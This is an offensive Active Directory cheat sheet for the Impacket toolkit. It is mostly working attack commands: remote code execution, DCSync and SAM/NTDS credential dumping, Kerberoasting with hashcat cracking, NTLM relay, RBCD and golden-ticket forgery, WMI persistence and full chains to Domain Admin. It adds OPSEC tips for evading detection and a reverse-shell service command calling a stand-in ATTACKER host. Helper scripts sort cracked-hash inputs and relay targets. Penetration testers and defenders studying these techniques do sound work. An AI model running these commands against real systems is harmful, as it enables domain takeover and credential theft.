// Python Network Attack Framework — Red Team Reference //

IMPACKET COMPLETE CHEAT SHEET + OPSEC GUIDE

v0.14.x (Fortra) · SMB · MSRPC · DCOM · LDAP · Kerberos · Active Directory · Kerberos attacks · Relay attacks
Install & Syntax
Install on Kali
sudo apt install impacket-scripts python3-impacket
Install from GitHub (latest)
git clone https://github.com/fortra/impacket
cd impacket && pip3 install . --break-system-packages
Kali Binary Names
impacket-secretsdump
impacket-psexec
impacket-wmiexec
impacket-smbclient
impacket-GetUserSPNs
impacket-ntlmrelayx
# or call directly: python3 /path/to/script.py
Universal Auth Syntax
# Password
DOMAIN/user:password@TARGET
# NTLM hash (LM:NT; the LM half may be left empty)
DOMAIN/user@TARGET -hashes LM:NT
DOMAIN/user@TARGET -hashes :NThashOnly
# Kerberos (ccache ticket taken from KRB5CCNAME)
DOMAIN/user@TARGET -k -no-pass
# AES key (Kerberos is used automatically when -aesKey is given)
DOMAIN/user@TARGET -aesKey AES256KEY -k
# No password prompt
DOMAIN/user@TARGET -no-pass
Ccache Ticket Usage
export KRB5CCNAME=/tmp/user.ccache
impacket-psexec DOMAIN/user@TARGET -k -no-pass
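The target string above is parsed the same way by every impacket-* script, and the rule has one sharp edge: a password containing '@' cannot be passed inline. The following Python is an added example, not code from the original page or from Impacket itself; it reimplements the [[DOMAIN/]USER[:PASSWORD]@]TARGET pattern used by impacket's example scripts (assumed unchanged in the installed version) and builds the argument tail for each auth method listed above. The account names and hosts are made up.

```python
import re

# Target grammar shared by the impacket example scripts: [[DOMAIN/]USER[:PASSWORD]@]TARGET.
# The regex mirrors the one in impacket/examples/utils.py (assumption: unchanged in the
# installed version); this block is a standalone reimplementation, not impacket's own code.
TARGET_RE = re.compile(r"(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)")


def parse_target(target: str) -> dict:
    """Split DOMAIN/user:password@host into its parts; absent parts come back as ''."""
    domain, user, password, host = TARGET_RE.match(target).groups("")
    return {"domain": domain, "user": user, "password": password, "host": host}


def password_is_safe_inline(password: str) -> bool:
    """A password containing '@' cannot be passed inline: the parser stops at the first '@'
    and treats everything after it as the host. Such passwords go through the interactive
    prompt (omit ':password') or are replaced by -hashes / -k authentication."""
    return "@" not in password


def build_auth_args(domain: str, user: str, host: str, password: str = None,
                    nthash: str = None, use_ccache: bool = False) -> list:
    """Return the argv tail for an impacket script for the chosen auth method."""
    identity = f"{domain}/{user}" if domain else user
    if use_ccache:
        return [f"{identity}@{host}", "-k", "-no-pass"]
    if nthash is not None:
        if not re.fullmatch(r"[0-9a-fA-F]{32}", nthash):
            raise ValueError("NT hash must be 32 hex characters")
        return [f"{identity}@{host}", "-hashes", f":{nthash}"]
    if password is not None and password_is_safe_inline(password):
        return [f"{identity}:{password}@{host}"]
    return [f"{identity}@{host}"]  # the tool prompts for the password


if __name__ == "__main__":
    # Made-up target: the '@' in the password swallows part of the host name
    print(parse_target("CORP/alice:p@ss@dc01.corp.local"))
    print(build_auth_args("CORP", "alice", "dc01.corp.local", password="p@ss"))
```

The '@' case is the one that bites in practice: the tool silently connects to the wrong host and reports a logon failure, so when the parsed host looks truncated, drop the inline password and use the prompt, a hash or a ccache.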
Complete Tool Reference Index
psexec.py           SMB/MSRPC RCE shell (noisy: drops a binary, creates a service)
wmiexec.py          WMI semi-interactive shell
smbexec.py          SMB service-based command exec (noisy: a service per command)
dcomexec.py         DCOM shell (ShellWindows/MMC20; no service, but output goes through ADMIN$)
atexec.py           Task Scheduler (ATSVC) exec
secretsdump.py      SAM/LSA/NTDS dump (DCSync, VSS, offline hives)
ntlmrelayx.py       NTLM relay attacks
GetUserSPNs.py      Kerberoasting
GetNPUsers.py       ASREPRoasting
getTGT.py           Request a TGT
getST.py            Service ticket / S4U2Self + S4U2Proxy
ticketer.py         Golden/Silver tickets
ticketConverter.py  kirbi ↔ ccache
findDelegation.py   Delegation enumeration
rbcd.py             RBCD attribute read/write/flush
smbclient.py        SMB file browser
lookupsid.py        SID brute force / RID cycling
samrdump.py         SAMR user enumeration
GetADUsers.py       AD user enumeration (LDAP)
addcomputer.py      Add/delete a machine account
mssqlclient.py      MSSQL shell
dpapi.py            DPAPI secret decryption
raiseChild.py       Child domain → forest root DA
goldenPac.py        MS14-068 PAC exploit
getPac.py           Dump a user's PAC
rpcdump.py          RPC endpoint dump
rdp_check.py        Test RDP credentials
Get-GPPPassword.py  GPP cpassword extraction
reg.py              Remote registry access
netview.py          Session tracking
wmipersist.py       WMI event-subscription persistence
smbserver.py        Rogue SMB server
Remote Command Execution — All Methods
psexec.py — SMB/MSRPC (NOISY)
impacket-psexec DOMAIN/admin:Pass@TARGET
impacket-psexec DOMAIN/admin@TARGET -hashes :NTLM
impacket-psexec DOMAIN/admin@TARGET -k -no-pass
# Opens a SYSTEM shell. Uploads a random-named RemComSvc binary to ADMIN$
# and installs it as a random-named service (Event 7045).
smbexec.py — Service-based (NOISY)
impacket-smbexec DOMAIN/admin:Pass@TARGET
# No binary drop, but every command creates and deletes a service
# (default name BTOBTO) that runs cmd via %COMSPEC% and logs Event 7045 each time
atexec.py — Task Scheduler
impacket-atexec DOMAIN/user:Pass@TARGET "whoami"
impacket-atexec DOMAIN/user@TARGET -hashes :NTLM "cmd /c ipconfig"
# Creates a scheduled task, runs it, reads the output file back over ADMIN$, deletes the task
wmiexec.py — WMI (Semi-interactive, Good OPSEC)
impacket-wmiexec DOMAIN/admin:Pass@TARGET
impacket-wmiexec DOMAIN/admin@TARGET -hashes :NTLM
impacket-wmiexec DOMAIN/admin@TARGET -k -no-pass
# -nooutput: still runs through cmd.exe, but never writes/reads the ADMIN$ output file
impacket-wmiexec DOMAIN/admin:Pass@TARGET -nooutput "net user hax /add"
# -silentcommand: launches the command as-is via Win32_Process.Create,
# no cmd.exe wrapper and no output retrieval at all
impacket-wmiexec DOMAIN/admin:Pass@TARGET -silentcommand "cmd /c ..."
# PowerShell instead of cmd for the interactive shell
impacket-wmiexec DOMAIN/admin:Pass@TARGET -shell-type powershell
dcomexec.py — DCOM (Stealthiest)
impacket-dcomexec DOMAIN/admin:Pass@TARGET
# Uses a DCOM object (ShellWindows by default; ShellBrowserWindow and MMC20 also available)
# No service creation and no dropped binary, but command output is still written to
# and read back from the ADMIN$ share unless -nooutput is used
impacket-dcomexec DOMAIN/admin:Pass@TARGET -object MMC20
impacket-dcomexec DOMAIN/admin:Pass@TARGET -nooutput "cmd /c ..."
Execution Method Noise Comparison
psexec
Drops binary, creates service, Event 7045. Avoid on live engagements
smbexec
Creates/deletes a service per command (Event 7045 each time), cmd.exe child processes
atexec
Scheduled task created/deleted (Events 4698/4699), output file in ADMIN$
wmiexec
Process creation under WmiPrvSE.exe (Event 4688), writes output to ADMIN$ share
dcomexec
DCOM object instantiation, no service; still writes output to ADMIN$ unless -nooutput. Quietest of the set, not silent
secretsdump.py — Credential Dumping
Remote — DCSync (drsuapi — default)
impacket-secretsdump DOMAIN/admin:Pass@DC_IP
impacket-secretsdump DOMAIN/admin@DC_IP -hashes :NTLM
impacket-secretsdump DOMAIN/admin@DC_IP -k -no-pass
# Against a DC this also pulls SAM, cached creds and LSA secrets over remote registry
# before replicating NTDS via drsuapi
Remote — VSS Method (shadow copy)
impacket-secretsdump DOMAIN/admin:Pass@TARGET -use-vss
# -exec-method: smbexec (default) | wmiexec | mmcexec
impacket-secretsdump DOMAIN/admin:Pass@TARGET -use-vss -exec-method wmiexec
Remote — NTDS only (skip SAM/LSA)
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-ntlm   # NT hashes only, no Kerberos keys
Single User DCSync
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user Administrator
Dump with Extra Info
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -pwd-last-set -user-status -history
Offline — SAM + SYSTEM hives
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Offline — NTDS.dit
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
impacket-secretsdump -ntds ntds.dit -system SYSTEM -outputfile hashes LOCAL
# -outputfile writes hashes.ntds (and .sam / .secrets where those were dumped)
🚨 OPSEC: DCSync (drsuapi) shows up on the DC as Event 4662 with the DS-Replication-Get-Changes(-All) control-access GUIDs, and any requester that is not another DC is a high-fidelity alert; an attacker-initiated DCSync cannot be made to look like DC-to-DC replication. The VSS method avoids drsuapi but is far louder on the host: it runs commands on the DC (a service via smbexec by default, or WMI), creates a shadow copy, and copies NTDS.dit and SYSTEM out over SMB. Choose by which telemetry the target actually collects.
Kerberoasting & ASREPRoasting
Kerberoasting — GetUserSPNs.py
# List SPNs (no ticket request)
impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP
# Request TGS tickets as crackable hashes (hashcat -m 13100 for RC4 / etype 23)
impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request
impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request -outputfile kerb.txt
# With hash auth
impacket-GetUserSPNs DOMAIN/user -hashes :NTLM -dc-ip DC_IP -request
# With Kerberos
impacket-GetUserSPNs DOMAIN/user -k -no-pass -dc-ip DC_IP -request
# A single account instead of every SPN in the domain
impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request-user svc_sql
Crack (hashcat)
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt   # RC4 (etype 23); AES128/AES256 tickets are -m 19600 / 19700
ASREPRoasting — GetNPUsers.py
# No creds: try a user list and dump AS-REP hashes for accounts without pre-auth
impacket-GetNPUsers DOMAIN/ -no-pass -dc-ip DC_IP -usersfile users.txt -format hashcat
# With valid creds: enumerate vulnerable users via LDAP and request for each of them
impacket-GetNPUsers DOMAIN/user:Pass -dc-ip DC_IP -request -format hashcat
impacket-GetNPUsers DOMAIN/user:Pass -dc-ip DC_IP -request -format hashcat -outputfile asrep.txt
Crack (hashcat)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
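Which hashcat mode applies depends on the encryption type embedded in the hash, not just on which tool produced it: RC4 TGS hashes go to 13100, AES128/AES256 TGS hashes to 19600/19700, and RC4 AS-REP hashes to 18200. The Python below is an added example, not part of the page or of Impacket, that parses the $krb5tgs$ / $krb5asrep$ lines GetUserSPNs and GetNPUsers -format hashcat emit, validates the checksum length for the etype, and sorts the lines into one bucket per hashcat mode. The sample hashes are constructed with random hex.

```python
import re

# hashcat modes for the formats GetUserSPNs / GetNPUsers (-format hashcat) emit
HASHCAT_MODES = {
    ("krb5tgs", 23): 13100,    # Kerberoast, RC4-HMAC (etype 23)
    ("krb5tgs", 17): 19600,    # Kerberoast, AES128-CTS-HMAC-SHA1-96
    ("krb5tgs", 18): 19700,    # Kerberoast, AES256-CTS-HMAC-SHA1-96
    ("krb5asrep", 23): 18200,  # AS-REP roast, RC4-HMAC
}
CHECKSUM_HEX_LEN = {23: 32, 17: 24, 18: 24}  # 16-byte HMAC-MD5 vs 12-byte HMAC-SHA1-96

# Constructed sample lines (shape of real output, random hex); not real tickets.
SAMPLE_TGS_RC4 = "$krb5tgs$23$*svc_sql$CORP.LOCAL$CORP.LOCAL/svc_sql*$3e156ada591263b8aab0965f5aebd837$" + "ab" * 48
SAMPLE_TGS_AES = "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$6b7c9d0e1f2a3b4c5d6e7f80$" + "cd" * 48
SAMPLE_ASREP = "$krb5asrep$23$jdoe@CORP.LOCAL:3e156ada591263b8aab0965f5aebd837$" + "ef" * 48


def parse_krb_hash(line: str) -> dict:
    """Split a $krb5tgs$ / $krb5asrep$ line into kind, etype, user, realm, checksum, edata
    and pick the hashcat mode. Raises ValueError for malformed or unsupported input."""
    parts = line.strip().split("$")
    if len(parts) < 5 or parts[0] != "" or parts[1] not in ("krb5tgs", "krb5asrep"):
        raise ValueError("not a krb5tgs/krb5asrep line")
    kind, etype = parts[1], int(parts[2])
    if kind == "krb5tgs":
        # RC4 layout: '*user$realm$spn*$cksum$edata'   AES layout: 'user$realm$*spn*$cksum$edata'
        ident = "$".join(parts[3:-2]).strip("*").split("$")
        user, realm = ident[0], ident[1]
        checksum, edata = parts[-2], parts[-1]
    else:
        # 'user@REALM:cksum$edata'
        ident, rest = "$".join(parts[3:]).split(":", 1)
        user, realm = ident.split("@", 1)
        checksum, edata = rest.split("$", 1)
    mode = HASHCAT_MODES.get((kind, etype))
    if mode is None:
        raise ValueError(f"no hashcat mode mapped here for {kind} etype {etype}")
    if not re.fullmatch(r"[0-9a-fA-F]*", checksum + edata) or len(checksum) != CHECKSUM_HEX_LEN[etype]:
        raise ValueError("checksum/edata are not well-formed hex for this etype")
    return {"kind": kind, "etype": etype, "user": user, "realm": realm,
            "checksum": checksum, "edata": edata, "mode": mode}


def group_by_mode(lines) -> dict:
    """Bucket roastable hashes by hashcat mode so each bucket can go to its own file/run."""
    buckets = {}
    for line in lines:
        if not line.strip():
            continue
        info = parse_krb_hash(line)
        buckets.setdefault(info["mode"], []).append(line.strip())
    return buckets


if __name__ == "__main__":
    for mode, lines in group_by_mode([SAMPLE_TGS_RC4, SAMPLE_TGS_AES, SAMPLE_ASREP]).items():
        users = [parse_krb_hash(l)["user"] for l in lines]
        print(f"hashcat -m {mode}: {len(lines)} hash(es) for {users}")
```

Mixing etypes in one hashcat input file makes hashcat reject the run, so bucketing before cracking is not cosmetic; an AES ticket in a 13100 file is the usual cause of "separator unmatched" errors.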
✓ OPSEC: Each Kerberoast request logs Event 4769 (TGS-REQ) on the DC. The detection that matters is the encryption type: GetUserSPNs asks for RC4 (etype 0x17) first, so an RC4 ticket for an account that supports AES, or a burst of TGS-REQs for many different SPNs from one source, stands out. -k only changes how the tool authenticates to LDAP and the KDC; the ticket requests themselves are Kerberos either way. Target a few accounts with -request-user instead of roasting every SPN.
Ticket Operations
getTGT.py — Request TGT
impacket-getTGT DOMAIN/user:Pass
impacket-getTGT DOMAIN/user -hashes :NTLM
impacket-getTGT DOMAIN/user -aesKey AES256KEY
export KRB5CCNAME=user.ccache   # getTGT saves <user>.ccache in the current directory
getST.py — Service Ticket / S4U2Proxy
# Basic ST request
impacket-getST DOMAIN/user:Pass -spn cifs/server.domain.local
# Impersonation via S4U2Self + S4U2Proxy (constrained delegation)
impacket-getST DOMAIN/svcaccount:Pass \
  -spn cifs/target.domain.local \
  -impersonate Administrator
# RBCD impersonation (machine account we control)
impacket-getST DOMAIN/'fakepc$':Pass \
  -spn cifs/DC.domain.local \
  -impersonate Administrator -dc-ip DC_IP
ticketConverter.py — kirbi ↔ ccache
impacket-ticketConverter admin.kirbi admin.ccache
impacket-ticketConverter admin.ccache admin.kirbi
Golden Ticket — ticketer.py
impacket-ticketer -nthash KRBTGT_NTLM \
  -domain-sid S-1-5-21-... \
  -domain DOMAIN.LOCAL \
  Administrator
export KRB5CCNAME=Administrator.ccache
Silver Ticket — ticketer.py
impacket-ticketer -nthash SERVICE_ACCOUNT_NTLM \
  -domain-sid S-1-5-21-... \
  -domain DOMAIN.LOCAL \
  -spn cifs/server.domain.local \
  Administrator
ntlmrelayx.py — NTLM Relay Attacks
Setup — Generate Target List (with nxc)
nxc smb 192.168.1.0/24 --gen-relay-list relay.txt   # only hosts where SMB signing is not required
# Turn off SMB (and HTTP, if ntlmrelayx should catch HTTP auth) in Responder first!
# Edit /etc/responder/Responder.conf → SMB = Off, HTTP = Off
Basic Relay → SAM Dump
impacket-ntlmrelayx -tf relay.txt -smb2support
# Default action on a successful SMB relay: dump the target's SAM
Relay → Command Execution
impacket-ntlmrelayx -tf relay.txt -smb2support \
  -c 'powershell -enc BASE64PAYLOAD'
Relay → SOCKS Proxy
impacket-ntlmrelayx -tf relay.txt -smb2support -socks
# After a relay: type "socks" in the interactive prompt to list held sessions
# Use proxychains → secretsdump/smbclient etc. through the SOCKS port
Relay to LDAP (add DA)
# Dump domain info via LDAP on relay (default action with an LDAP target)
impacket-ntlmrelayx -t ldap://DC_IP -smb2support
# Escalate an existing low-priv user through ACL abuse on the relayed session
impacket-ntlmrelayx -t ldaps://DC_IP -smb2support \
  --escalate-user lowpriv_user
# Caveats: ldap:// needs LDAP signing not enforced, ldaps:// needs no channel binding,
# and SMB-originated auth cannot be relayed to LDAP(S) at all unless --remove-mic
# (CVE-2019-1040) applies, because the SMB client sets the NTLM sign flag.
# HTTP/WebDAV-originated auth (mitm6, WebDAV coercion) relays to LDAP cleanly.
Relay → RBCD Attack (machine account + delegation)
impacket-ntlmrelayx -t ldap://DC_IP -smb2support \
  --delegate-access
# Creates a machine account (needs MachineAccountQuota > 0) and writes it into
# msDS-AllowedToActOnBehalfOfOtherIdentity of the relayed computer account, so the
# relayed auth has to come from a computer account (coerced machine auth). The same
# SMB → LDAP signing caveat applies. Shadow credentials are a different option
# (--shadow-credentials), not part of --delegate-access.
Relay with Responder / MiTM6
# Terminal 1 (LLMNR/NBT-NS/mDNS poisoning; SMB and HTTP set to Off in Responder.conf):
sudo responder -I eth0 -rdw
# Terminal 2:
impacket-ntlmrelayx -tf relay.txt -smb2support -socks
# IPv6 variant: run mitm6 -d domain.local in terminal 1 and let ntlmrelayx serve WPAD itself
impacket-ntlmrelayx -6 -wh fakewpad.domain.local -tf relay.txt -smb2support -socks
# Coerce machine auth with PetitPotam (a separate tool built on Impacket, not an impacket-* script):
python3 PetitPotam.py -d DOMAIN -u USER -p PASS ATTACKER_IP DC_IP
🚨 Relay only works where the destination does not require signing: SMB signing not required on SMB targets (nxc --gen-relay-list filters for exactly this), LDAP signing not enforced for ldap://, and no channel binding for ldaps://. Relaying a host's authentication back to the same host does not work (blocked since MS08-068), so the coerced source and the relay target must be different machines. Verify with an nxc SMB scan before attempting.
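The relay-list step is where most failed relays are decided, so it is worth doing deliberately. The Python below is an added example (not Impacket or nxc code) that parses the per-host lines nxc smb prints, keeps only hosts where signing is not required, and lets you exclude the machines whose authentication you plan to coerce, since a host cannot be relayed to itself. The scan output is a constructed sample in nxc's line format for a made-up network.

```python
import re

# Constructed sample of netexec/nxc "smb" output (the per-host line nxc prints); not a real network.
SAMPLE_NXC = """\
SMB         192.168.1.10    445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.21    445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.1.22    445    WS-ALICE         [*] Windows 10 Build 19041 x64 (name:WS-ALICE) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.23    445    WS-BOB           [*] Windows 11 Build 22621 x64 (name:WS-BOB) (domain:corp.local) (signing:False) (SMBv1:False)
"""

HOST_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+445\s+(?P<name>\S+).*?"
    r"\(domain:(?P<domain>[^)]+)\).*?\(signing:(?P<signing>True|False)\)"
)


def parse_nxc_smb(text: str) -> list:
    """One dict per host line: ip, name, domain, signing (True = signing required)."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            d = m.groupdict()
            d["signing"] = d["signing"] == "True"
            hosts.append(d)
    return hosts


def relay_targets(hosts: list, exclude=()) -> list:
    """Targets for ntlmrelayx -tf: only hosts where SMB signing is not required, and never a
    host whose own authentication you intend to coerce or capture (reflecting NTLM back to
    the originating host has been blocked since MS08-068)."""
    excluded = {e.lower() for e in exclude}
    return [
        f"smb://{h['ip']}"
        for h in hosts
        if not h["signing"] and h["ip"] not in excluded and h["name"].lower() not in excluded
    ]


def signing_required(hosts: list) -> list:
    """Hosts to drop from the SMB relay list (if they are DCs, probe LDAP signing separately)."""
    return [h["name"] for h in hosts if h["signing"]]


if __name__ == "__main__":
    hosts = parse_nxc_smb(SAMPLE_NXC)
    print("signing required (not relayable over SMB):", signing_required(hosts))
    # WS-ALICE is the box we intend to coerce, so it must not be a relay target
    print("\n".join(relay_targets(hosts, exclude={"WS-ALICE"})))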
SMB Tools
smbclient.py — File Access
impacket-smbclient DOMAIN/user:Pass@TARGET
# Interactive commands: shares, use SHARE, ls, cd, lcd, get, put, mget, rm, mkdir
# Non-interactive: feed commands from a file with -file (there is no -c flag)
printf 'use C$\ncd Users\\Administrator\\Desktop\nget secret.txt\n' > cmds.txt
impacket-smbclient DOMAIN/user:Pass@TARGET -file cmds.txt
smbserver.py — Host a Share
# Serve current dir as share "SHARE"
impacket-smbserver SHARE $(pwd) -smb2support
# With auth (avoids guest/anonymous restrictions on modern Windows)
impacket-smbserver SHARE $(pwd) -smb2support -username user -password pass
# Target pulls: \\ATTACKER_IP\SHARE\file.exe
lookupsid.py — SID/User Enum
impacket-lookupsid DOMAIN/user:Pass@TARGET
impacket-lookupsid DOMAIN/user:Pass@TARGET 1000   # max RID to cycle through
samrdump.py — SAMR Enum
impacket-samrdump DOMAIN/user:Pass@TARGET
Get-GPPPassword.py
impacket-Get-GPPPassword DOMAIN/user:Pass@DC_IP
AD Enumeration
GetADUsers.py
impacket-GetADUsers DOMAIN/user:Pass -dc-ip DC_IP -all # Shows all users + email, lastLogon, pwdLastSet
findDelegation.py
impacket-findDelegation DOMAIN/user:Pass -dc-ip DC_IP
# Lists unconstrained, constrained (with target SPNs) and RBCD
impacket-findDelegation DOMAIN/user:Pass -dc-ip DC_IP -user svcaccount
rpcdump.py — RPC Endpoints
impacket-rpcdump @TARGET
impacket-rpcdump DOMAIN/user:Pass@TARGET -port 135
# PetitPotam check: look for the EFSRPC interface (rpcdump labels it [MS-EFSR])
impacket-rpcdump @TARGET | grep -i -A2 'MS-EFSR'
rdp_check.py — Valid RDP Creds
impacket-rdp_check DOMAIN/user:Pass@TARGET
netview.py — Session Tracking
impacket-netview DOMAIN/user:Pass -dc-ip DC_IP -target SERVER
getArch.py — OS Architecture
impacket-getArch -target TARGET
Delegation Attacks & RBCD
Step 1 — Add Fake Computer Account
impacket-addcomputer DOMAIN/user:Pass -dc-ip DC_IP \
  -computer-name 'fakepc$' -computer-pass 'FakePass123!'
Step 2 — Write RBCD Attribute
impacket-rbcd DOMAIN/user:Pass -dc-ip DC_IP \
  -action write \
  -delegate-to 'TARGET$' \
  -delegate-from 'fakepc$'
# Read RBCD attribute:
impacket-rbcd DOMAIN/user:Pass -dc-ip DC_IP -action read -delegate-to 'TARGET$'
# Clear RBCD attribute:
impacket-rbcd DOMAIN/user:Pass -dc-ip DC_IP -action flush -delegate-to 'TARGET$'
Step 3 — Get Impersonation ST (S4U)
impacket-getST DOMAIN/'fakepc$':FakePass123! \
  -spn cifs/TARGET.domain.local \
  -impersonate Administrator \
  -dc-ip DC_IP
# getST prints the ccache it saved (current versions name it
# Administrator@cifs_TARGET.domain.local@DOMAIN.LOCAL.ccache); export that filename
export KRB5CCNAME=Administrator@cifs_TARGET.domain.local@DOMAIN.LOCAL.ccache
Step 4 — Use Ticket
impacket-secretsdump DOMAIN/Administrator@TARGET.domain.local \
  -k -no-pass -dc-ip DC_IP
# Target must be the hostname in the SPN, not an IP, or the ticket will not match
Constrained Delegation (S4U2Proxy)
impacket-getST DOMAIN/svcacct:Pass \
  -spn cifs/fileserver.domain.local \
  -impersonate Administrator -dc-ip DC_IP
Golden & Silver Tickets
Get Domain SID + krbtgt hash first
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt
impacket-lookupsid DOMAIN/user:Pass@DC_IP   # read the Domain SID from the output
Golden Ticket (any user, 10yr TTL)
impacket-ticketer \
  -nthash KRBTGT_NTHASH \
  -domain-sid S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX \
  -domain DOMAIN.LOCAL \
  Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec DOMAIN/Administrator@DC_IP -k -no-pass
Silver Ticket (for specific SPN)
impacket-ticketer \
  -nthash SERVICE_ACCOUNT_NTHASH \
  -domain-sid S-1-5-21-... \
  -domain DOMAIN.LOCAL \
  -spn cifs/fileserver.domain.local \
  Administrator
export KRB5CCNAME=Administrator.ccache
🚨 OPSEC: Forging is offline in both cases, but using the ticket is not. A golden ticket is a forged TGT, so every service access still sends a TGS-REQ to the DC (Event 4769 with no matching 4768 for that logon, an anomaly SIEM rules look for). A silver ticket is a forged service ticket presented straight to the service, so the DC never sees it; it only needs that service account's key and only works for that SPN. Prefer silver tickets for a specific target, and set realistic lifetimes rather than the 10-year default.
mssqlclient.py — MSSQL Attacks
Connect & Auth
impacket-mssqlclient DOMAIN/user:Pass@TARGET -windows-auth          # Windows (NTLM) auth
impacket-mssqlclient DOMAIN/user@TARGET -hashes :NTLM -windows-auth
impacket-mssqlclient DOMAIN/user@TARGET -k -no-pass                  # Kerberos
impacket-mssqlclient sa:Pass@TARGET                                  # SQL auth (the default without -windows-auth)
OS Command Execution (xp_cmdshell)
# Inside the mssqlclient interactive shell:
enable_xp_cmdshell
xp_cmdshell whoami
xp_cmdshell "powershell -enc BASE64"
# Disable after use (OPSEC):
disable_xp_cmdshell
Queries & Enumeration
SELECT name FROM master.dbo.sysdatabases;
SELECT SYSTEM_USER;                  -- current login
SELECT IS_SRVROLEMEMBER('sysadmin'); -- am I sysadmin? (1 = yes)
EXEC sp_linkedservers;               -- linked servers
File Read via BULK INSERT
CREATE TABLE tmp (line NVARCHAR(MAX));
BULK INSERT tmp FROM 'C:\Windows\win.ini' WITH (ROWTERMINATOR = '\n');
SELECT * FROM tmp;
DROP TABLE tmp;
-- Needs ADMINISTER BULK OPERATIONS (or sysadmin); the file is read as the SQL service account
dpapi.py — DPAPI Secret Extraction
Decrypt DPAPI masterkey
impacket-dpapi masterkey \
  -file MasterKey \
  -sid S-1-5-21-... \
  -password UserPassword
Decrypt DPAPI blob
impacket-dpapi credential \
  -file CredFile \
  -key MASTERKEY_HEX
Decrypt vault secrets
impacket-dpapi vault \
  -vcrd vault.vcrd \
  -vpol vault.vpol \
  -key MASTERKEY_HEX
Registry, RPC & Misc Tools
reg.py — Remote Registry
impacket-reg DOMAIN/admin:Pass@TARGET query \
  -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
impacket-reg DOMAIN/admin:Pass@TARGET add \
  -keyName "HKLM\..." -v ValueName -vt REG_SZ -vd Data
services.py — Service Manipulation
impacket-services DOMAIN/admin:Pass@TARGET list
impacket-services DOMAIN/admin:Pass@TARGET start -name SvcName
impacket-services DOMAIN/admin:Pass@TARGET stop -name SvcName
impacket-services DOMAIN/admin:Pass@TARGET create \
  -name Svc -display Name -path "C:\Windows\nc.exe -e cmd ATTACKER 4444"
wmipersist.py — WMI Persistence
# wmipersist takes a VBScript file (-vbs), not an inline command; -timer is in milliseconds
impacket-wmipersist DOMAIN/admin:Pass@TARGET install \
  -name PersistName \
  -vbs payload.vbs \
  -timer 60000
# Alternatively trigger on a WQL event filter instead of a timer (-filter 'SELECT ...')
impacket-wmipersist DOMAIN/admin:Pass@TARGET remove -name PersistName
⚠ CLEANUP: Always remove WMI subscriptions and created services after operations. wmipersist remove is critical — WMI subscriptions survive reboots.
Domain Escalation & Trust Attacks
raiseChild.py — Child Domain → Forest DA
impacket-raiseChild -target-exec PARENT_DC_IP \
  child.domain.local/admin:Pass
# Forges a child golden ticket with the forest Enterprise Admins SID in ExtraSids
# (SID history), then DCSyncs the forest root and psexecs onto -target-exec
goldenPac.py — MS14-068 PAC Forgery
impacket-goldenPac DOMAIN/user:Pass@DC_FQDN
# DC must be vulnerable (unpatched MS14-068)
# Forges a PAC with DA group membership, no krbtgt hash needed
getPac.py — Read User's PAC
impacket-getPac DOMAIN/user:Pass -targetUser admin
addcomputer.py — Machine Account Quota Abuse
# Any domain user can add computers if MachineAccountQuota > 0 (default 10)
impacket-addcomputer DOMAIN/user:Pass \
  -dc-ip DC_IP \
  -computer-name 'attacker$' \
  -computer-pass 'P@ssword123!'
# Delete (cleanup):
impacket-addcomputer DOMAIN/user:Pass -dc-ip DC_IP \
  -computer-name 'attacker$' \
  -delete
GetLAPSPassword.py
impacket-GetLAPSPassword DOMAIN/user:Pass -dc-ip DC_IP
impacket-GetLAPSPassword DOMAIN/user:Pass \
  -dc-ip DC_IP \
  -computer TARGET_PC
Complete Attack Chains
Chain 1 — Kerberoast → DA
GetUserSPNs -> crack TGS -> secretsdump -> Domain Admin
impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request -outputfile kerb.txt
hashcat -m 13100 kerb.txt rockyou.txt
impacket-secretsdump DOMAIN/svcaccount:Cracked@DC_IP   # only if the cracked account holds admin/replication rights
Chain 2 — NTLM Relay → RBCD → DA
gen relay list -> ntlmrelayx --delegate-access -> getST impersonate -> DA
nxc smb 192.168.1.0/24 --gen-relay-list relay.txt
impacket-ntlmrelayx -t ldap://DC_IP -smb2support --delegate-access
# After a relayed computer-account auth: fake computer EVIL$ created, RBCD written;
# use the account name and password ntlmrelayx prints
impacket-getST DOMAIN/'EVIL$':Pass -spn cifs/TARGET -impersonate Administrator
export KRB5CCNAME=Administrator.ccache   # use the filename getST prints
impacket-secretsdump DOMAIN/Administrator@TARGET -k -no-pass
Chain 3 — ASREPRoast → PTH → DCSync
GetNPUsers (no creds) -> crack AS-REP -> secretsdump SAM -> DCSync
impacket-GetNPUsers DOMAIN/ -no-pass -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt rockyou.txt
impacket-secretsdump DOMAIN/user:Cracked@TARGET   # needs local admin on TARGET; get an admin hash
